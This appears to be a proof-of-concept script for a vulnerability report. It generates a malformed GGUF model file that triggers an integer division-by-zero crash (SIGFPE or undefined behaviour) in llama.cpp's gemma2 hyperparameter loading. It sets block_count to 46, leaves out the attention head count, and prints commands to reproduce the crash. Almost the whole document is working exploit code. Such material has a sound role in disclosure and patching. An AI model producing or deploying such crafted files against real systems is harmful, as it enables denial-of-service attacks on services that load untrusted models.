#!/usr/bin/env python3
"""
PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.
Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:
hparams.f_attention_scale = type == LLM_TYPE_27B
? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
: 1.0f / std::sqrt(float(hparams.n_embd_head_k));
When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken.
If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr
stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0.
This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero.
The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
n_embd_head_k calculation, not the architecture-specific code at line 1347.
Platform behavior:
- x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
- ARM64: Silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
but UBSan catches it and aborts with exit code 134
Attack vector:
1. Set general.architecture = "gemma2"
2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
3. Set gemma2.embedding_length = 4096 (any non-zero value)
4. Set gemma2.context_length = 8192 (required)
5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
6. OMIT gemma2.attention.head_count (this is loaded with required=false)
7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero
The crash occurs during load_hparams(), before vocab or tensor loading,
so no valid vocabulary or tensor data is needed.
Confirmed UBSan output:
src/llama-model.cpp:1347:61: runtime error: division by zero
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
"""
import struct
import os
# GGUF container constants (see the GGUF spec in the ggml repository).
GGUF_MAGIC = b"GGUF"         # 4-byte magic at file offset 0
GGUF_VERSION = 3             # GGUF container format version written in the header
GGUF_DEFAULT_ALIGNMENT = 32  # default alignment (bytes) for the tensor-data section
# GGUF KV type constants: value-type tags written before each KV payload.
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8
def write_string(f, s):
    """Serialize *s* in GGUF string form: a little-endian uint64 byte
    length followed by the raw UTF-8 bytes (no null terminator)."""
    payload = s.encode('utf-8')
    f.write(struct.pack('<Q', len(payload)) + payload)
def write_kv_string(f, key, value):
    """Emit one GGUF KV pair whose payload is a string.

    Layout: key (GGUF string), uint32 type tag, value (GGUF string).
    """
    write_string(f, key)                           # key name
    f.write(struct.pack('<I', GGUF_TYPE_STRING))   # value-type tag
    write_string(f, value)                         # payload
def write_kv_uint32(f, key, value):
    """Emit one GGUF KV pair whose payload is a little-endian uint32.

    Layout: key (GGUF string), uint32 type tag, uint32 value — the tag and
    value are packed in a single '<II' write (identical bytes on the wire).
    """
    write_string(f, key)
    f.write(struct.pack('<II', GGUF_TYPE_UINT32, value))
def write_kv_float32(f, key, value):
    """Emit one GGUF KV pair whose payload is an IEEE-754 float32.

    Layout: key (GGUF string), uint32 type tag, float32 value — the tag and
    value are packed in a single '<If' write (identical bytes on the wire).
    """
    write_string(f, key)
    f.write(struct.pack('<If', GGUF_TYPE_FLOAT32, value))
def create_gemma2_divzero_gguf(output_path):
    """Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading.

    The crash occurs in load_hparams() at the LLM_ARCH_GEMMA2 case, before
    vocab or tensor loading. So we need:
    - A valid GGUF v3 header
    - The required KV pairs for gemma2 (but NOT attention.head_count)
    - Zero tensors (the crash happens before tensors are loaded)

    The work is split into helpers: header, KV section, alignment padding,
    and the human-readable report printed after the file is written.
    """
    n_tensors = 0  # No tensors needed; crash is in hparams loading
    n_kv = 5       # Number of KV pairs emitted by _write_poc_kv_pairs()
    with open(output_path, 'wb') as f:
        _write_gguf_header(f, n_tensors, n_kv)
        _write_poc_kv_pairs(f)
        _pad_to_alignment(f)
    _print_poc_report(output_path)


def _write_gguf_header(f, n_tensors, n_kv):
    """Write the fixed-size GGUF v3 header: magic, version, tensor and KV counts."""
    f.write(GGUF_MAGIC)                       # magic: "GGUF"
    f.write(struct.pack('<I', GGUF_VERSION))  # version: 3
    f.write(struct.pack('<Q', n_tensors))     # n_tensors
    f.write(struct.pack('<Q', n_kv))          # n_kv


def _write_poc_kv_pairs(f):
    """Write the 5 KV pairs that reach the vulnerable gemma2 code path.

    gemma2.attention.head_count is DELIBERATELY omitted so that n_head_arr
    stays all-zero and n_head(0) == 0 at the division site.
    """
    # 1. general.architecture = "gemma2"
    #    This selects LLM_ARCH_GEMMA2 in load_arch().
    write_kv_string(f, "general.architecture", "gemma2")
    # 2. gemma2.context_length = 8192
    #    Required (loaded at line 517 with required=true).
    write_kv_uint32(f, "gemma2.context_length", 8192)
    # 3. gemma2.embedding_length = 4096
    #    Required (loaded at line 518 with required=true).
    #    Must be non-zero so that n_embd / n_head(0) is a non-trivial division.
    write_kv_uint32(f, "gemma2.embedding_length", 4096)
    # 4. gemma2.block_count = 46
    #    Required (loaded at line 520 with required=true).
    #    46 layers triggers LLM_TYPE_27B at line 1341, which selects the
    #    vulnerable code path at line 1347 that divides by n_head(0).
    write_kv_uint32(f, "gemma2.block_count", 46)
    # 5. gemma2.attention.layer_norm_rms_epsilon = 1e-6
    #    Required for gemma2 (loaded at line 1334 with required=true).
    #    This must be present or load_hparams() throws before reaching line 1347.
    write_kv_float32(f, "gemma2.attention.layer_norm_rms_epsilon", 1e-6)
    # DELIBERATELY OMITTED: gemma2.attention.head_count
    #   This key is loaded at line 571 with required=false:
    #     ml.get_key_or_arr(LLM_KV_ATTENTION_HEAD_COUNT, hparams.n_head_arr, hparams.n_layer, false);
    #   When omitted, n_head_arr stays filled with 0s (from std::fill at line 552).
    #   Then at line 1347: hparams.n_embd / hparams.n_head(0) = 4096 / 0 => SIGFPE


def _pad_to_alignment(f):
    """Pad the file with zero bytes up to the default GGUF alignment boundary.

    Even with 0 tensors, pad for spec compliance.
    """
    current_pos = f.tell()
    aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT
    if aligned_pos > current_pos:
        f.write(b'\x00' * (aligned_pos - current_pos))


def _print_poc_report(output_path):
    """Print the summary of the generated PoC and how to reproduce the crash."""
    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print("[*]")
    print("[*] Vulnerability details:")
    print("[*]   Architecture:     gemma2 (LLM_ARCH_GEMMA2)")
    print("[*]   block_count:      46 (triggers LLM_TYPE_27B)")
    print("[*]   embedding_length: 4096")
    print("[*]   head_count:       OMITTED (stays 0 from std::fill)")
    print("[*]")
    print("[*] Crash location: src/llama-model.cpp:1347")
    print("[*]   hparams.n_embd / hparams.n_head(0)")
    print("[*]   = 4096 / 0")
    print("[*]   => integer division by zero (UB)")
    print("[*]")
    print("[*] Test with (x86_64 -- deterministic SIGFPE crash):")
    print(f"[*]   ./build/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*]   Expected: SIGFPE, exit code 136")
    print("[*]")
    print("[*] Test with UBSan (any platform -- clean UB report):")
    print("[*]   cmake -B build-ubsan \\")
    print("[*]     -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*]     -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*]     -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*]     -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*]     -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF")
    print("[*]   cmake --build build-ubsan -j$(nproc)")
    print(f"[*]   ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'")
    print("[*]   Expected: 'runtime error: division by zero', exit code 134")
if __name__ == "__main__":
    # Write the PoC into a gguf_poc directory next to this script.
    # (The original used a hardcoded user-specific absolute path, which
    # breaks on any other machine.)
    output_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "gguf_poc")
    os.makedirs(output_dir, exist_ok=True)
    output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
    create_gemma2_divzero_gguf(output_path)